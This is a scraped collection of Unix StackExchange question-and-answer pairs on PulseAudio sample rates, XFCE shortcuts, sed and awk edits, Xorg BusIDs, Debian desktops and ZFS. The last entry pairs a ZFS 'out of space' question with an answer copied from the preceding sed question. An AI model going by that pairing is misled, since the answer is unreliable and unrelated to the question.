{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585646", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/180005/" ] }
585,789
When using the h2n as USB mic and playback device, it displays 44.1khz as sample rate. When pulseaudio restarts, it is detected correctly ( pacmd list-sinks ): sample spec: s16le 2ch 44100Hz Now I start playing a video on youtube and while it plays, turn the "Profile" of it in "pavucontrol" -> "Configuration" to "off" and back to "Analog Stereo Duplex". Now pulseaudio tells me: sample spec: s16le 2ch 48000Hz On a fresh system start it's even enough to just open pavucontrol to cause the wrong sampling rate. Which results in a pitched output with a lot of crackling. Stuff I have tried: 1. Make the following changes to ~/.config/pulse/daemon.conf : default-sample-rate = 44100avoid-resampling = yes as suggested in another question ( Setting different per-device sampling rates in pulseaudio? ) and in https://wiki.archlinux.org/index.php/PulseAudio/Troubleshooting 2. put pcm.device{ format S16_LE rate 41000 type hw card 0 device 0}pcm.!default{ type plug slave.pcm "device"} into ~/.asoundrc and logging out and back in. ( https://unix.stackexchange.com/a/141234/227331 ) 3. put pcm.!default { type rate slave { pcm "plughw:0,0" rate 44100 }} into ~/.asoundrc as suggested here: https://bbs.archlinux.org/viewtopic.php?pid=400718#p400718 and rebooting. 4. pactl list sinks | grep -oP "(?<=device.string = \")(.*)(?=\")" | while read in; do pasuspender -- speaker-test --nloops=1 --channels=2 --test=wav --device=$in; done as suggested in https://www.freedesktop.org/wiki/Software/PulseAudio/Documentation/Users/Troubleshooting/ sounds good. Afterwards firefox will resume with crackling noises.
After Installing cadence and jack2, adding myself to the audio group ( usermod -a -G audio username ), logging back in and setting cadence to use the h2n for input and output it seems to be promising. In pavucontrol I have a "Jack sink" for output and "Jack source" for input and I can select those as default when I need to use it. No crackling yet. So basically I need to put jack between pulseaudio and alsa to make it work, if I understand the linux audio environment correctly. Edit I have tried to remove pulseaudio completely now. Quite a lot of programs still work, but not all of them. In order to get volume control working I made this: https://github.com/sezanzeb/ALSA-Control . Also see https://unix.stackexchange.com/a/293206/227331 Edit 2 try https://pipewire.org/
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585789", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/227331/" ] }
585,799
Hope you are having a fantastic week. I'll jump straight to the topic. I'm using xfce-Kali 2020.1b, xfce v4.14. I wanted to assign 'Super' to xfce4-appfinder in place of whiskermenu because it was way more responsive on my chromebook machine. I was able to bind it and use xfce4-appfinder but was unable to disable whiskermenu's shortcut. So they would launch at the same time or one after the other. As far as I understand, whiskermenu used to only launch with a keybind to xfce4-popup-whiskermenu that could be set via the Keyboard app's application shortcuts section. But that caused issues with being unable to use 'Super' for any other shortcut because the shortcuts set in "~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml" still get activated on press rather then on release as stated here in the xfce's bug tracker. But I don't have this problem. So my best guess is Super was hard coded to whiskermenu by some party to remedy this bug. I did a grep search on the entire machine to find where the cfg file for this hardcoded Super is but was unsuccessful. All I found was Ctrl+Esc shortcuts, which cause no harm: $ sudo grep -ri "xfce4-popup-whiskermenu" /* 2>/dev/null/etc/xdg/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Alt&gt;F1" type="string" value="xfce4-popup-whiskermenu --pointer"/>/etc/xdg/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Primary&gt;Escape" type="string" value="xfce4-popup-whiskermenu"/>Binary file /home/thmyris/.mozilla/firefox/gzthh3eo.default-esr/places.sqlite-wal matchesBinary file /home/thmyris/.mozilla/firefox/gzthh3eo.default-esr/places.sqlite matches/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Primary&gt;Escape" type="string" value="xfce4-popup-whiskermenu"/>/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Alt&gt;F1" type="string" value="xfce4-popup-whiskermenu --pointer"/> There is another post from 6 years ago about this problem's past incarnation here but neither that question nor the answers are of use to this problem sadly.
Super_L key is not hard-coded with Whiskermenu. Application shortcuts can be accessed in the settings manager.Open Settings Manager > Keyboard > Application Shortcuts or via xfconf-query in xfce4-keyboard-shortcuts channel xfconf-query -c xfce4-keyboard-shortcuts -l In that channel there could be a property that defines Super_L key shortcut xfconf-query -c xfce4-keyboard-shortcuts -p /commands/custom/Super_L However, from the output provided... /home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Primary&gt;Escape" type="string" value="xfce4-popup-whiskermenu"/>/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Alt&gt;F1" type="string" value="xfce4-popup-whiskermenu --pointer"/ Ctrl + Escape is a key-combo set to popup whisker menu at the panel plugin's button and Alt + F1 is set to popup whisker menu at the current mouse position If Super_L stil pops Whisker Menu, most likely there is a daemon running that monitors for Super_L key press and when it is the case, emulates Ctrl+Escape.There are two applications, that I know of, that fit the description: xcape and ksuperkey. One of these could be installed and set to run on startup. Both run as a daemon and both are used to prevent Super key breaking other Super key combinations.If it is xcape, the autostart command is set to run daemon is: xcape -e 'Super_L=Control_L|Escape' Xcape is in Debian repos, so it is most likely used.In case of ksuperkey: ksuperkey -e 'Super_L=Control_L|Escape' Check which daemon is running and check if there is a autostart entry in the settings: Settings Manager > Session and Startup > Application Autostart.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585799", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/405462/" ] }
585,843
I'm developing homepages to myself. The pages looks good on my laptop but I would like to see if it looks good also in my mobile. Can I test how the sites looks in mobile without publishing the site first in the Internet? My laptop has Ubuntu 20.04.
Firefox and Chromium have Responsive Design Mode : Press Ctrl + Shift + M (For Chromium accessible only in Developer Tools, in Firefox globally)
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/585843", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411784/" ] }
585,892
I would like to replace the values 3 and 4 for 0 and 1, respectively, in all fields in the first, third, fiveth row and so on until the end of the following data set: 2 4 3 0 2 4 3 0 3 0 4 4 3 0 4 4 4 2 4 3 4 2 4 3 2 3 4 2 2 3 4 2 So, the desired result is: 2 1 0 0 2 4 3 0 0 0 1 1 3 0 4 4 1 2 1 0 4 2 4 3 2 0 1 2 2 3 4 2 I'm using the following code to do that: awk '{for (i = 1; i <= NR; i=(i+2)) if($i == 3) {$i = 0} if($i == 4) {$i = 1} }END {print $0}' b.temp However, the output for this code is only the values in the last row of b.temp file (2 3 4 2). How can I do that? The code needs to that for any numer of rows and fields. The solution can be in awk, sed or other alternative in shell script. Thanks in advance
With sed: sed 'y/34/01/;n' file Which means: Replace 3 and 4 by 0 and 1 in this line and print it; Get next line and print it; Get next line and repeat cycle. This would however fail if the data contained, for example, 14, transforming it to 11. To work around that, opt for sed 's/\<4\>/1/g;s/\<3\>/0/g;n' file Those \< and \> matches the beginning and end of a word.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585892", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/362318/" ] }
585,910
From the output of lspci how do I interpret the BUSID for xorg.conf.d ? Example: 00:02.0 VGA compatible controller: Intel Corporation Skylake GT2 [HD Graphics 520] (rev 07)01:00.0 Display controller: Advanced Micro Devices, Inc. [AMD/ATI] Sun XT [Radeon HD 8670A/8670M/8690M / R5 M330 / M430 / Radeon 520 Mobile] (rev 83) How do I write the BUSID for the AMD card ? Is this correct ? BUSID PCI 0@1:00:0
In your lspci output, 01:00.0 means bus 1, device 0, function 0, which maps to a BusID specifier of PCI:1:0:0 (without specifying the domain): BusID "PCI:1:0:0" See the xorg.conf documentation for details.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585910", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/230582/" ] }
586,003
A high-votes answer here for the question "What's the lightest desktop" which actually tried to quantitatively assess memory use relies on a Wikipedia page which quotes 2011 data . The newest article I could find dates back to November 2018 (thanks to https://LinuxLinks.com ). Are there newer comparisons which objectively measure memory use?
I think to measure such consumption isn't going to be easy. You can measure it simply by installing it into VM and default configuration. However, when your configuration changes so does the memory consumption. You would have to do some long-term statistics for your workflow. In my eyes it will also differ based on the distribution you are using - gentoo, archlinux will probably have different results than Ubuntu, Opensuse, RH. There is also a strategy in Linux to use all available memory. I presume you want to use the gui on system where there is not enough memory available. For that you would need to perform your own tests. You would have to see how the environment deals with low levels of memory (if it can free the used memory, can be effective on low memory systems, et.) If you want some newer statistics for different env. you can check this Ubuntu flavors one. It does not cover your list but most of it Comparison Of Memory Usages Of Ubuntu 19.04 And Flavors In 2019 (July)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586003", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/49368/" ] }
586,018
I find myself frequently needing to rename different files with mv that are in deep directories: mv /a/long/path/to/a/file.txt /a/long/path/to/a/file.txt.bak But I don't want to retype the full path name. Is there a quick shorthand or alias that I could use? I.e.: $ mv /a/long/path/to/a/file.txt file.txt.bak$ ls /a/long/path/to/a/file.txt.baka/long/path/to/a/file.txt.bak (note: this is for straightforward, single file renames in different directories at different times, not for mass-renames )
Use a brace expansion : mv /a/long/path/to/a/file.txt{,.bak} This renames /a/long/path/to/a/file.txt with an empty suffix to /a/long/path/to/a/file.txt with suffix .bak .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586018", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/382668/" ] }
586,024
I am writing a bash script to help new Linux users install Debian desktop environments easily but most of some packages rely on xorg. I think it might not work properly if no xorg is found on the target user machine. I really need to know if there is a Debian Linux distro without xorg and if any, what do they use? Github link
Debian can be set up without X.org, but the tasks corresponding to all desktop environments which need X.org depend on it (through task-desktop ). Thus installing the appropriate task-based meta-package, using tasksel , will pull in the X.org packages if necessary. The default desktop environment, GNOME, uses Wayland by default in Debian 10, and it is possible to install that without xserver-xorg ; this will use xwayland to run X applications. But the default setup, using GNOME, still installs X.org. (If you want to run GNOME with no xserver-xorg packages, install the base system with no desktop environment, then run apt install --no-install-recommends gnome .)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586024", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/292716/" ] }
586,151
I'd like to delete a line if it does not start with "a" "c" "t" or "g", and the next line starts with '>'. In the following example, "`>seq3" is deleted. Input: >seq1actgatgac>seq2ctgacgtca>seq3>seq4gtagctagt>seq5tgacatgca Expected output: >seq1actgatgac>seq2ctgacgtca>seq4gtagctagt>seq5tgacatgca I've tried with sed ( sed '/^>.*/{$!N;/^>.*/!P;D}' and sed '/^>/{$d;N;/^[aA;cC;gG;tT]/!D}' ) but got no success.
You could try something like this: $ sed -e '$!N;/^>.*\n>/D' -e 'P;D' file>seq1actgatgac>seq2ctgacgtca>seq4gtagctagt>seq5tgacatgca That is maintain a two line buffer with $!N ... P;D look for a pattern that starts with > and has another > after the newline delete up to the newline
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586151", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411696/" ] }
586,186
On one of my servers, I am running ZFS - no issues during two years. However, today I wanted to create an additional zvol, which only lead to an error message stating we were "out of space". The weird thing is that there definitely is enough space: root@cerberus:/vm-images# zfs list -r -t allNAME USED AVAIL REFER MOUNTPOINTrpool 956G 842G 96K nonerpool/stretch 926G 842G 926G /rpool/swap 29.8G 869G 2.82G -root@cerberus:/vm-images# zfs create -b 512 -o checksum=on -o compression=off -o primarycache=none -o redundant_metadata=all -o secondarycache=none -o logbias=latency -o snapdev=hidden -o sync=standard -V 600G rpool/vm-garakcannot create 'rpool/vm-garak': out of space So we have 842 GB of space available, but it refuses to create a zvol with 600 GB in size. Any idea what I am doing wrong? EDIT 1 (as per request of @Jim L.): No reservations are in use: root@cerberus:/vm-images# zfs list -o name,reservation -rNAME RESERVrpool nonerpool/stretch nonerpool/swap none
You could try something like this: $ sed -e '$!N;/^>.*\n>/D' -e 'P;D' file>seq1actgatgac>seq2ctgacgtca>seq4gtagctagt>seq5tgacatgca That is maintain a two line buffer with $!N ... P;D look for a pattern that starts with > and has another > after the newline delete up to the newline
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586186", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/210810/" ] }